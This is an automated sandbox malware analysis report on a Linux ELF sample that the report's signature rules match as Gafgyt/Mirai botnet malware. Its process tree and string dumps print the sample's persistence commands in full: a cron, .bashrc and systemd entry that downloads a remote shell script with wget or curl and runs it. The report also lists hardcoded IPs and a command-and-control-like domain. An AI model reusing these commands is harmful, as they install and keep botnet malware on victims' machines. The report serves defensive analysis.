Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
x86_64.elf

Overview

General Information

Sample name:x86_64.elf
Analysis ID:1558942
MD5:c060aa8e1d7eeef5b50c97c829f479ff
SHA1:3f5bd2cac04b460b9c2d0c07c7d6d95475daaf17
SHA256:934af9b9bf9838d64d44911f92190a6742d152a421ed1a74762fb41b93f7366d
Tags:elfuser-abuse_ch
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Executes the "crontab" command typically for achieving persistence
Machine Learning detection for sample
Modifies the '.bashrc' or '.bash_profile' file typically for persisting actions
Sample tries to persist itself using cron
Creates hidden files and/or directories
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "systemctl" command used for controlling the systemd system and service manager
Found strings indicative of a multi-platform dropper
Reads the 'hosts' file potentially containing internal network hosts
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1558942
Start date and time:2024-11-20 01:00:12 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 55s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:x86_64.elf
Detection:MAL
Classification:mal80.troj.linELF@0/4@3/0
Command:/tmp/x86_64.elf
PID:5489
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
we kinda rocking ngl
Standard Error:
  • system is lnxubuntu20
  • x86_64.elf (PID: 5489, Parent: 5414, MD5: c060aa8e1d7eeef5b50c97c829f479ff) Arguments: /tmp/x86_64.elf
    • x86_64.elf New Fork (PID: 5490, Parent: 5489)
      • sh (PID: 5496, Parent: 5490, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -"
        • sh New Fork (PID: 5497, Parent: 5496)
          • sh New Fork (PID: 5499, Parent: 5497)
          • crontab (PID: 5499, Parent: 5497, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
          • sh New Fork (PID: 5500, Parent: 5497)
          • chmod (PID: 5500, Parent: 5497, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x bins.sh
          • sh New Fork (PID: 5501, Parent: 5497)
          • sh (PID: 5501, Parent: 5497, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh bins.sh
          • sh New Fork (PID: 5502, Parent: 5497)
          • curl (PID: 5502, Parent: 5497, MD5: add6bc2195e82c55985ccf49fd4048e6) Arguments: /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh
          • sh New Fork (PID: 5507, Parent: 5497)
          • chmod (PID: 5507, Parent: 5497, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x bins.sh
        • sh (PID: 5497, Parent: 5496, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh bins.sh
        • sh New Fork (PID: 5498, Parent: 5496)
        • crontab (PID: 5498, Parent: 5496, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -
      • sh (PID: 5508, Parent: 5490, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/bin/systemctl enable bot"
        • sh New Fork (PID: 5509, Parent: 5508)
        • systemctl (PID: 5509, Parent: 5508, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: /bin/systemctl enable bot
  • systemd New Fork (PID: 5511, Parent: 5510)
  • snapd-env-generator (PID: 5511, Parent: 5510, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • cleanup
SourceRuleDescriptionAuthorStrings
x86_64.elfLinux_Trojan_Gafgyt_9e9530a7unknownunknown
  • 0xa7d0:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
x86_64.elfLinux_Trojan_Gafgyt_807911a2unknownunknown
  • 0xafdf:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D
x86_64.elfLinux_Trojan_Gafgyt_d4227dbfunknownunknown
  • 0x8086:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
  • 0x8238:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
x86_64.elfLinux_Trojan_Gafgyt_d996d335unknownunknown
  • 0xe076:$a: D0 EB 0F 40 38 37 75 04 48 89 F8 C3 49 FF C8 48 FF C7 4D 85 C0
x86_64.elfLinux_Trojan_Gafgyt_620087b9unknownunknown
  • 0xab9f:$a: 48 89 D8 48 83 C8 01 EB 04 48 8B 76 10 48 3B 46 08 72 F6 48 8B
Click to see the 4 entries
SourceRuleDescriptionAuthorStrings
5489.1.0000000000400000.0000000000411000.r-x.sdmpLinux_Trojan_Gafgyt_9e9530a7unknownunknown
  • 0xa7d0:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
5489.1.0000000000400000.0000000000411000.r-x.sdmpLinux_Trojan_Gafgyt_807911a2unknownunknown
  • 0xafdf:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D
5489.1.0000000000400000.0000000000411000.r-x.sdmpLinux_Trojan_Gafgyt_d4227dbfunknownunknown
  • 0x8086:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
  • 0x8238:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
5489.1.0000000000400000.0000000000411000.r-x.sdmpLinux_Trojan_Gafgyt_d996d335unknownunknown
  • 0xe076:$a: D0 EB 0F 40 38 37 75 04 48 89 F8 C3 49 FF C8 48 FF C7 4D 85 C0
5489.1.0000000000400000.0000000000411000.r-x.sdmpLinux_Trojan_Gafgyt_620087b9unknownunknown
  • 0xab9f:$a: 48 89 D8 48 83 C8 01 EB 04 48 8B 76 10 48 3B 46 08 72 F6 48 8B
Click to see the 13 entries
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: x86_64.elfAvira: detected
Source: x86_64.elfReversingLabs: Detection: 36%
Source: x86_64.elfJoe Sandbox ML: detected
Source: x86_64.elfString: @/cmdline/wget/tftp/curl/reboot/libbin//dev/watchdog/dev/misc/watchdogx86_64->unknown%d/bin/busybox/bin/sh/var/Sofiatelnetd
Source: x86_64.elfString: /bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh"
Source: x86_64.elfString: j2go/proc/net/tcp5.188.230.23137.18.73.94167.235.128.15168.191.23.13445.195.74.233141.94.21.7118.220.154.2118.210.151.8537.187.153.12745.195.74.1970123456789ABCDEF(crontab -l ; echo "@reboot %s") | crontab -/bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh"%s/.bashrc
Source: .bashrc.13.drString: /bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh"
Source: bot.service.13.drString: ExecStart=/bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh"
Source: /bin/curl (PID: 5502)Reads hosts file: /etc/hostsJump to behavior
Source: /tmp/x86_64.elf (PID: 5489)Socket: 127.0.0.1:4161Jump to behavior
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: host.zopz-api.com
Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
Source: tmp.KcMIgX.22.drString found in binary or memory: http://serverip/bins/bins.sh
Source: bot.service.13.drString found in binary or memory: http://serverip/bins/bins.sh;

System Summary

barindex
Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_520deeb8 Author: unknown
Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_01e4a728 Author: unknown
Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
Source: 5489.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
Source: 5489.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
Source: 5489.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
Source: 5489.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
Source: 5489.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
Source: 5489.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
Source: 5489.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 Author: unknown
Source: 5489.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 Author: unknown
Source: 5489.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
Source: 5490.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
Source: 5490.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
Source: 5490.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
Source: 5490.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
Source: 5490.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
Source: 5490.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
Source: 5490.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 Author: unknown
Source: 5490.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 Author: unknown
Source: 5490.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
Source: Initial sampleString containing 'busybox' found: /bin/busybox
Source: Initial sampleString containing 'busybox' found: @/cmdline/wget/tftp/curl/reboot/libbin//dev/watchdog/dev/misc/watchdogx86_64->unknown%d/bin/busybox/bin/sh/var/Sofiatelnetd
Source: ELF static info symbol of initial sample.symtab present: no
Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_520deeb8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f4dfd1d76e07ff875eedfe0ef4f861bee1e4d8e66d68385f602f29cc35e30cca, id = 520deeb8-cbc0-4225-8d23-adba5e040471, last_modified = 2021-09-16
Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_01e4a728 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d90477364982bdc6cd22079c245d866454475749f762620273091f2fab73c196, id = 01e4a728-7c1c-479b-aed0-cb76d64dbb02, last_modified = 2021-09-16
Source: x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
Source: 5489.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
Source: 5489.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
Source: 5489.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
Source: 5489.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
Source: 5489.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
Source: 5489.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
Source: 5489.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f4dfd1d76e07ff875eedfe0ef4f861bee1e4d8e66d68385f602f29cc35e30cca, id = 520deeb8-cbc0-4225-8d23-adba5e040471, last_modified = 2021-09-16
Source: 5489.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d90477364982bdc6cd22079c245d866454475749f762620273091f2fab73c196, id = 01e4a728-7c1c-479b-aed0-cb76d64dbb02, last_modified = 2021-09-16
Source: 5489.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
Source: 5490.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
Source: 5490.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
Source: 5490.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
Source: 5490.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
Source: 5490.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
Source: 5490.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
Source: 5490.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f4dfd1d76e07ff875eedfe0ef4f861bee1e4d8e66d68385f602f29cc35e30cca, id = 520deeb8-cbc0-4225-8d23-adba5e040471, last_modified = 2021-09-16
Source: 5490.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d90477364982bdc6cd22079c245d866454475749f762620273091f2fab73c196, id = 01e4a728-7c1c-479b-aed0-cb76d64dbb02, last_modified = 2021-09-16
Source: 5490.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
Source: classification engineClassification label: mal80.troj.linELF@0/4@3/0

Persistence and Installation Behavior

barindex
Source: /bin/sh (PID: 5499)Crontab executable: /usr/bin/crontab -> crontab -lJump to behavior
Source: /bin/sh (PID: 5498)Crontab executable: /usr/bin/crontab -> crontab -Jump to behavior
Source: /tmp/x86_64.elf (PID: 5490)File written: /root/.bashrcJump to behavior
Source: /usr/bin/crontab (PID: 5498)File: /var/spool/cron/crontabs/tmp.KcMIgXJump to behavior
Source: /usr/bin/crontab (PID: 5498)File: /var/spool/cron/crontabs/rootJump to behavior
Source: /tmp/x86_64.elf (PID: 5490)File: /root/.bashrcJump to behavior
Source: /bin/curl (PID: 5502)Directory: /root/.curlrcJump to behavior
Source: /tmp/x86_64.elf (PID: 5496)Shell command executed: sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -"Jump to behavior
Source: /tmp/x86_64.elf (PID: 5508)Shell command executed: sh -c "/bin/systemctl enable bot"Jump to behavior
Source: /bin/sh (PID: 5500)Chmod executable: /usr/bin/chmod -> chmod +x bins.shJump to behavior
Source: /bin/sh (PID: 5507)Chmod executable: /usr/bin/chmod -> chmod +x bins.shJump to behavior
Source: /bin/sh (PID: 5509)Systemctl executable: /bin/systemctl -> /bin/systemctl enable botJump to behavior
Source: /bin/curl (PID: 5502)Queries kernel information via 'uname': Jump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information2
Scripting
Valid Accounts1
Scheduled Task/Job
1
Unix Shell Configuration Modification
1
Unix Shell Configuration Modification
1
File and Directory Permissions Modification
OS Credential Dumping1
Security Software Discovery
Remote ServicesData from Local System1
Non-Application Layer Protocol
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Systemd Service
1
Systemd Service
1
Hidden Files and Directories
LSASS Memory1
File and Directory Discovery
Remote Desktop ProtocolData from Removable Media1
Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
Scheduled Task/Job
1
Scheduled Task/Job
Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCron2
Scripting
Login HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1558942 Sample: x86_64.elf Startdate: 20/11/2024 Architecture: LINUX Score: 80 47 host.zopz-api.com 172.111.38.48, 1290, 52424 INCERO-HVVCUS Reserved 2->47 49 daisy.ubuntu.com 2->49 53 Malicious sample detected (through community Yara rule) 2->53 55 Antivirus / Scanner detection for submitted sample 2->55 57 Multi AV Scanner detection for submitted file 2->57 59 Machine Learning detection for sample 2->59 10 x86_64.elf 2->10         started        12 systemd snapd-env-generator 2->12         started        signatures3 process4 process5 14 x86_64.elf 10->14         started        file6 45 /root/.bashrc, ASCII 14->45 dropped 65 Modifies the '.bashrc' or '.bash_profile' file typically for persisting actions 14->65 18 x86_64.elf sh 14->18         started        20 x86_64.elf sh 14->20         started        22 x86_64.elf 14->22         started        24 2 other processes 14->24 signatures7 process8 process9 26 sh crontab 18->26         started        30 sh sh 18->30         started        32 sh systemctl 20->32         started        file10 43 /var/spool/cron/crontabs/tmp.KcMIgX, ASCII 26->43 dropped 61 Sample tries to persist itself using cron 26->61 63 Executes the "crontab" command typically for achieving persistence 26->63 34 sh crontab 30->34         started        37 sh chmod 30->37         started        39 